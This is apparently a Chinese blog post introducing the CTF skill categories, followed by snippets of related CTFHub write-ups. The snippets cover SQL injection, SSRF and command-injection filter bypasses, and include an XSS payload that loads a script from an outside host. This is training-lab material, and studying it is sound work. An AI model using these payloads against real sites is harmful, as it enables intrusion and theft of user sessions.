谈谈CTF技能树

最新推荐文章于 2025-04-24 08:00:00 发布
原创 最新推荐文章于 2025-04-24 08:00:00 发布 · 6.9k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #经验分享

嗨!今天来聊聊CTF中的技能树的五个分支--Web、Pwn、Reverse、Crypto、Misc。博主现在只接触过Web,但相信今后会学习其他四项技能。

一、Web

        即万维网,我们日常上网浏览的网页主要由三部分组成--HTML、CSS和Javascrip。Html如同网页的骨干,它编辑了网页的标题、正文等内容;CSS做的是网页的外观,颜色、背景,让网页更加美观。Javascrip是一种脚本语言,可以制作一些动态效果,插入可以播放的视频,让网页更加人性化,易于使用。同时,web安全问题不容忽视,网页作为维系服务端和客户端的纽带,若遭到攻击,可能会导致数据被窃取,网站被挂马等危害。

二、Pwn

主要用于漏洞挖掘、提权从而来实现破解漏洞、攻破服务器。学习pwn需要二进制、汇编语言、C语言、linux等基础。

常见的漏洞有:

缓冲区溢出 比如堆溢出,栈溢出,整数溢出,bss溢出,data溢出。最常见的就是栈溢出吧,还有格式化字符串和逻辑漏洞。

三、Rerverse

即逆向。学习逆向需要C语言、汇编语言、文件格式等基础。逆向工程将低级代码转换到高级代码,方便人的阅读。人编写的高级语言进过汇编成为汇编语言,而将汇编语言转换成高级语言即是逆向工程的目标。逆向工程是一个复杂的过程,需要较好的理论知识基础,并要多实践。

四、Crypto

主要是破解加密的文件,需要了解各种加密方式。可以通过一些工具辅助解密。个人认为crypto和数据安全关系比较大,学习crypto可以更好的认识到数据安全的漏洞从而更好加强维护数据安全。

五、Misc

misc涉及流量分析、电子取证、人肉搜索、数据分析等。用解码工具打开照片可以得到照片的编码方式,通过分析可以找到可能有效的信息。misc要求充分利用各种已知信息,不断地寻找有效信息,或对信息转码得到有用信息。要求有较深的理论知识,分析能力,动手能力和毅力。

总结:博主虽然只接触过web,但我相信兴趣驱动的学习是高效的。我对破解方面感兴趣,我会好好打牢基础知识,多实践操作,不断进步。最终capture the flag。

heytom7
关注
CTF技能树
qq_38158710的博客
04-15 1039
CTH技能树 持续更新中。。。。。。 WEB前置技能 ——HTTP协议 请求方式 HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. BurpSuite解法 挂上BurpSuite,重新打开题目 直接放过拦截到的第一个包如下图 拦截到的第二个包如下图 将拦截到的第二个包的GET改为
CTF相关了解
qq_44841017的博客
04-21 1855
基础知识 CTF简介 CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中...
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 1万+
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
CTFHub技能树-SSRF
qq_66105152的博客
07-24 1746
直接访问就行。
CTFhub技能树-Web-信息泄露
2301_81988171的博客
08-14 2536
在平常的工作中,当我们在单独拉取的功能分支中进行开发时,遇到线上出现bug需要进行紧急修复,我们需要切换到主分支,进行代码的修复。合理的方式应该是将功能分支的代码临时存储在某个位置,当我们切回到当前分支,读取该存储,将之前的改动恢复。这就引起了git泄露漏洞。当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。这样的命令,完美的解决了这个问题,其将当前未提交的修改(即工作区和暂存区的修改)先暂时储藏起来。
CTFHub技能树
weixin_59480274的博客
04-23 5831
文章目录一、CTF基础知识1、CTF简介2、竞赛二、使用步骤1.引入库2.读入数据总结 一、CTF基础知识 1、CTF简介 开启题目 2、竞赛 开启题目 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ss
CTF HUB技能树sql注入(整型注入)
2401_85133563的博客
01-15 442
那么就猜表名称是news,data这里应该会输出我们想要的数据。后面的步骤就是sql的老套路了,orderby -->爆库名--》爆表名--〉爆字段名--》拿到数据。我试了orderby 到3的时候报错,说明他有2个字段,那么就尝试一下进行联合查询, 我们的union 关键词没有被过滤,说明可以进行联合查询。打开题目是个框框里面可以输入ID,题目说了是整型注入,应该不会有引号闭合问题。果真爆出来了数据库 名,叫sqli,group_concat()函数,可以输出全部的表名,得到有一个表名为flag。
CTFHub技能树rce
最新发布
star3119391396的博客
04-24 647
审计代码,发现过滤了flag关键字,include包含文件的内容,根据提示,发现有个shell.txt文件,而且文件内容是接受传参请求,可以利用这个漏洞。过滤三个关键字cat,flag,ctfhub,可以使用两个单引号或者两个双引号绕过。,可以使用%0a来作为回车符使用,效果一样。有个phpinfo()的网页,打开,搜索flag,没有。根据代码和提示,要使用php协议读取目录/flag。过滤了目录分隔符,但是可以使用命令拼接来找flag。过滤空格,可以使用${IFS}绕过。过滤了cat,但是可以用tac。
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 2044
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHUB技能树——web
qq_63980959的博客
04-20 1万+
因为我一开始是没打算写博客的,所有前面的图基本都没截图,以至于后面想写博客的时候没图,又没有金币了,我想吃西瓜都吃不到,更别说充金币。分币不花,玩的就是陪伴。前面的一些图来自于大佬们的博客,我会在结尾@出来。
CTFHUB技能树(全详细解析含进阶)
热门推荐
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
ctfhub技能树—rce
Naptmn的博客
02-16 428
ssrf不会做了QAQ 开始前可以大概了解一下rce中的常用绕过方法rce注入过滤 文章目录命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤 命令注入 没有任何过滤,直接127.0.0.1|ls查看文件 然后cat一下flag即可(f12找到flag,被注释了) 过滤cat 将cat过滤,我们可以考虑用tac,即倒着输出,同上,首先ls,之后tac一下flag文件即可 过滤空格 空格可以用许多种方法绕过 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${
ctfhub技能树—ssrf
Naptmn的博客
02-16 609
文章目录1、内网访问 1、内网访问 内网访问要求我们从特定的服务器发送请求才能读取到信息,根据题目要求可以知道要求我们从127.0.0.1访问flag.php 打开题目之后可以看到网址上的url=_ 于是我们构造如下url即可得到flag ...
ctfhub新手入门题小记(技能树
m0_64869113的博客
10-23 210
一:在技能树的前几道题中主要还是考察对于burp suite的使用的考察,几乎全部都可以使用其中的功能解决,如base64,urldecode的解码,抓包,改包,使用爆破模块,拦截包等操作,burp suite是一个功能多样,易于操作的软件(暂时还不知道怎么汉化)二:还有一些其他操作的使用,如在网页上crtl+f进行查找,插件,从其他地方下载一些工具(如在github上下载一些实用的工具)还有对python爬虫的使用(会请求和写一些自动化遍历的东西即可)等,有时会有更多样化的解题思路。
CTF之旅(CTFHub技能树+详细Write up+持续更新ing)(首页)
weixin_51563603的博客
10-23 7929
CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就写了个首页,汇总一下地址,大家见谅 1.web前置技能(已完结) 2.信息泄露(已完结) 3.密码口令+XSS(已完结) 4.SQL注入(已完结) 5.文件上传(持续更新) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意思,每个人有每个
CTFHUB-技能树-Web题-SQL注入-时间盲注
Static______的博客
04-03 1396
1=1即为真,那么将会执行sleep(3),也就是睡眠3秒钟(默认单位为秒)那既然我们可以构造这个函数,我们就用这个函数来到时间盲注这个靶场尝试一下。得到四个库名,猜测flag最有可能在sqli中,尝试爆破表名来看看。1=1就是我们的条件,sleep(3)为我们的A,1为我们的B。说明即存在时间盲注,我们通过sqlmap可以直接跑出结果。庞大的工作量太过耗时,所以到此为止,开始sqlmap注入。得到表名为flag,news,猜测结果就在flag表中。到这我们已经了解了这个判断语句,那我们可以尝试。
网络安全、夺旗赛(CTF)技能汇总
拥抱AI的老粽子
10-22 6828
本文综合博主参赛准备经历,总结介绍了过程中了解的网络安全、夺旗赛(CTF)相关知识及资源,分为资料篇、工具篇、解题思路篇。
5分钟带你入门—CTFHub技能树(最详细教程)
2201_75642447的博客
03-30 1683
CTF(CaptureTheFlag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
ctfhub 技能树 hhtttp
01-06
### CTFHub 技能树介绍 CTFHub 是一个专注于网络安全竞赛(Capture The Flag, CTF)的学习平台,旨在帮助参与者提升在各种安全领域的能力。技能树是该平台上用于指导学习者逐步掌握不同类型的漏洞利用和技术的重要组成部分。 #### XSS 攻击中的 DOM 跳转技术 在处理特定的跨站脚本攻击(XSS)场景时,DOM跳转会涉及到URL解析和重定向逻辑。例如,在给定的例子中,通过访问带有特殊查询字符串的链接`http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=http://example.com/`[^1],JavaScript代码会读取并解析这个 URL 参数来执行相应的操作。具体来说,`.split("=")`方法被用来分割参数名称与对应的值。 #### 利用 DOM 反射型 XSS 进行攻击 另一个重要的概念是在 Web 应用程序中存在的反射型 XSS漏洞。这种类型的攻击通常发生在服务器端未正确过滤用户输入的情况下。当恶意脚本作为响应的一部分返回给浏览器时就会触发此类攻击。比如下面这段 HTML 注入的内容可以绕过某些简单的防护机制: ```html ';</script><script src=//xs.pe/6b6></script> ``` 此片段会在页面加载过程中被执行,并尝试从外部资源加载额外的 JavaScript 文件[^2]。 为了有效应对这些威胁,开发者应该始终遵循最佳实践原则,如对所有不可信的数据进行严格的验证和编码处理;同时也要不断更新自己的知识体系以跟上最新的攻防趋势。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值